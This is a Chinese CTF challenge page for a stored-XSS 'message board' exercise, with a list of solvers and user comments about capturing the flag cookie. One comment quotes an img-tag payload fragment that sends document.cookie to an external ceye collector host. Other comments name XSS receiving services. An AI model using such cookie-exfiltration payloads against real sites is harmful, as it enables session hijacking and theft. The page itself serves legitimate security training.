留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3321
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(18)
解题动态
小白RM 攻破了该题 4天前
anton_小金鱼 攻破了该题 4天前
2523822945 攻破了该题 4天前
Anna-july 攻破了该题 4天前
wujita01 攻破了该题 6天前
rhythm 攻破了该题 7天前
小崔 攻破了该题 7天前
一只小羊 攻破了该题 7天前
TNF 攻破了该题 7天前
影人sha 攻破了该题 8天前
249190331 攻破了该题 9天前
Habadog 攻破了该题 9天前
故里love长安 攻破了该题 9天前
FlyXz 攻破了该题 10天前
finsh 攻破了该题 10天前
Hackerchen 攻破了该题 11天前
ctfhub2004 攻破了该题 11天前
SingA_Song 攻破了该题 12天前
YS_JW 攻破了该题 12天前
评论
YS_JW 12天前
举报
我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因
BLX123 3月前
举报
想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己
网恋秀牛子被录屏导致自卑 3月前
举报
ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag
igrazee 4月前
举报
flag{*******}
TTxyz 6月前
举报
啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???
solomom 7月前
举报
感觉这道题目被改了很多,我看之前的评论,用了dirsearch只能找了admin.php,没有db.sql,而用了几个xss平台也没有回显,只有登录到了后台才会跳出来所有的xss回显,当前可以尝试一下sql盲注。
韭菜叶花肉来个茶蛋 8月前
举报
现在正常做出来的选手,有没有能解释下的
qfgk16 8月前
举报
xss根本不会回显,s||||b题目,骗金币的
qfgk16 8月前
举报
@妈!有人打我 谢谢
妈!有人打我 8月前
举报
@qfgk16 http://ceye.io/ 注册下就可以了
qfgk16 8月前
举报
@妈!有人打我 有什么能用的平台吗
妈!有人打我 8月前
举报
可以的 应该是你xss平台不可以接受http协议
ctfer-pls 9月前
举报
不知道密码怎么获取
冥王 11月前
举报
纯潮种,admin.php页面直接输入评论区的账号密码,flag直接在url里面,页面是报错的页面
qq1002517 2月前
举报
赤峰老乡吗?